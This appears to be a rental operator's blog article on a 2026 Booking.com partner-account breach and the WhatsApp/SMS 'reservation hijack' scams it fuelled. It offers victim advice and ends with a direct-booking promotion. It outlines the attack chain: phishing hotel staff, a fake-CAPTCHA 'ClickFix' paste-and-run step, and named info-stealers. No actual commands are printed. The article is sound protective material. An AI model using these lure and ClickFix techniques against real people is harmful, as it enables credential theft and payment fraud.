Olbia city centre at night. Foto RENTAL12
Booking.com Data Breach 2026: How Reservation Hijack Scams Target Travellers
Floriana Panvini Rosati · 9 min read · 31 May 2026
Quick Guide
On 13 April 2026, Booking.com notified customers that attackers accessed reservation data—names, emails, phone numbers, booking details—through compromised hotel-partner accounts. The stolen data fuels “reservation hijack” scams: WhatsApp or SMS messages quoting your exact booking and demanding urgent payment. Booking.com says its own systems were not breached; financial data was not accessed. Protect yourself by keeping all communication and payment inside the official app, or book direct with a verified operator.
Action Protocol: What to Do Right Now
- Never tap a payment link from a message—even if it quotes your exact booking. Re-open the app yourself.
- Keep all payment inside the platform. Booking.com will never ask for card details by email, WhatsApp, SMS, or bank transfer.
- Change your Booking.com password now (unique, not reused) and enable 2FA or passkey.
- Verify with the property directly using the phone number or email from your original confirmation—not from the suspicious message.
- RENTAL12 properties process payment exclusively through Stripe/Lodgify (PCI Level 1, end-to-end encrypted)—no private IBANs, no cash, no intermediaries. Verify at rental12.com/en/trust.
What Happened in April 2026
Quick answer: On 13 April 2026, Booking.com emailed customers that “unauthorised third parties” had accessed reservation data—names, emails, phone numbers, booking details—through compromised hotel-partner accounts. No financial data was taken. Reservation PINs were reset.
The emails, reported by Skift, TechCrunch, and The Guardian, confirmed that attackers accessed guest names, email addresses, phone numbers, booking details (property name, stay dates, confirmation reference), and any messages guests had shared with the property. Financial and payment data were not accessed, and Booking.com states its own backend infrastructure was not breached—the exposure came from hotel-partner accounts.
This is not new. The same pattern traces back to December 2018 (4,109 customers exposed via a UAE hotel vishing scam; Dutch DPA fine of €475,000 for late reporting). It accelerated through 2023—the Eurovision WhatsApp scam wave, UK Action Fraud logging 532 reports and £370,000 in losses—and into 2025–2026 with Microsoft’s Storm-1865/ClickFix report and Sekoia’s “I Paid Twice” campaign. As recently as 23 May 2026, Japanese hotel operator Polaris Holdings detected ¥9 million diverted via tampered payout bank details on its Booking.com group account.
“Booking.com will never ask guests to share credit card details by email, over the phone, WhatsApp or text, or ask guests to make a bank transfer that is different from the payment policy details in their booking confirmation.” — Booking.com Trust & Safety policy (verified May 2026)
Why Your Booking Data Is a Phishing Weapon
Quick answer: The stolen fields—your name, hotel, dates, confirmation number—are exactly the “shared secrets” you assume only you and the hotel know. A scam message quoting them bypasses ordinary scepticism because it feels like customer service, not fraud.
A stolen password still has to defeat two-factor authentication. Stolen booking data needs nothing except a WhatsApp message to a guest already expecting to hear from the hotel. Gen Digital’s March 2026 “Reservation Hijack Scam” analysis identified two lure tiers: high-context lures that name the guest, cite exact stay dates, and pre-fill a fake payment page with real data; and low-context lures that rely on hotel branding and urgency alone. The most dangerous variant injects the scam into the genuine Booking.com chat thread—the guest sees it alongside legitimate check-in instructions from the same sender.
“The fraud pipeline is faster than the disclosure process”—in some documented cases, scam messages reached guests before the breach notification did. — Constella Intelligence analysis, 17 April 2026
Reports differ on whether postal addresses were also exposed; Booking.com told TechCrunch that physical addresses were not accessed. The number of customers affected has not been disclosed.
How the Scam Chain Works: From Hotel Inbox to Your WhatsApp
Quick answer: Attackers phish hotel staff with fake Booking.com “guest complaint” emails, trick them into running malware via a fake CAPTCHA (the “ClickFix” technique), steal extranet credentials, read real reservations, then contact guests with scam payment requests using the stolen booking details.
Microsoft tracks the primary threat actor as Storm-1865—a financially motivated group operating across North America, Oceania, South and Southeast Asia, and Europe since early 2023.
The attack runs in three stages. Stage 1: a phishing email hits the hotel’s reservations desk posing as a Booking.com “Partner” message—typically a fake guest complaint needing urgent response. Stage 2: the link leads to a counterfeit CAPTCHA that tricks the employee into pressing Win+R, Ctrl+V, Enter—secretly executing a command that downloads info-stealer malware. Because the employee runs the command themselves, it looks authorised to security tools. Stage 3: the malware harvests extranet credentials, the attacker reads real reservation data, then contacts guests with scam payment requests.
Different research teams documented different payloads: Microsoft identified XWorm, VenomRAT, and others via mshta.exe; Sekoia’s “I Paid Twice” report found PureRAT via PowerShell; Bridewell described a distinct credential-harvesting path using Evilginx and homograph “bookling” domains.
AZULIS Apartments, Olbia—owner-operated, direct-booking available. Foto RENTAL12
How to Spot a Reservation Hijack in 30 Seconds
Quick answer: A 24–48 hour cancellation threat, a request to pay or “verify your card” outside the official platform, and a channel jump from in-app to WhatsApp or SMS—these are the three signature red flags, even when the message quotes your exact booking details.
Sources: Gen Digital (Mar 2026), Booking.com Trust & Safety, Norton (Mar 2026), Microsoft (Mar 2025)
The critical insight from this table: correct booking details are not proof of legitimacy. Both the real hotel and the attacker have the same data. The only reliable signals are the payment method, the urgency, and the channel.
The Safe-Booking Baseline: Rules That Protect You Everywhere
Quick answer: Keep all communication and payment inside the official app. Never re-enter card details for “verification.” Contact the property using your original confirmation’s contact details, not the message’s. Or remove the partner-account attack surface entirely by booking direct with verified operators.
These rules apply on any booking platform:
Re-open the booking yourself—type the URL or open the app. Check status there, not through any link.
Use the phone number or email from your original confirmation or the property’s official website—never from the suspicious message.
Change your password (unique, not reused), enable 2FA or passkey, and watch for credential-stuffing on your email.
Call your bank immediately. Cancel or freeze the card. Enable transaction alerts. Watch for follow-on charges—stolen cards are tested with small amounts first.
Booking direct with an operator whose payment chain you can verify removes the partner-account attack surface entirely—no extranet credential to steal, no reservation thread to hijack.
Update history
31 May 2026 — Initial publication. Sources: Microsoft Security Blog (Mar 2025), Gen Digital/Norton (Mar 2026), Skift/TechCrunch/The Guardian (Apr 2026), Sekoia “I Paid Twice” (Nov 2025), Bridewell BR-UNC-030 (Feb 2026), Constella (Apr 2026), Polaris Holdings/TRAICY (May 2026), Booking.com Trust & Safety (verified May 2026). Fact-checked against 30+ primary sources; conflicts flagged per editorial policy.
Frequently Asked Questions
Book Direct. Skip the Risk.
Payment through Stripe/Lodgify (PCI Level 1). No private IBANs. No intermediaries. €10,000 Payment Integrity Guarantee backed by owner-held reserves.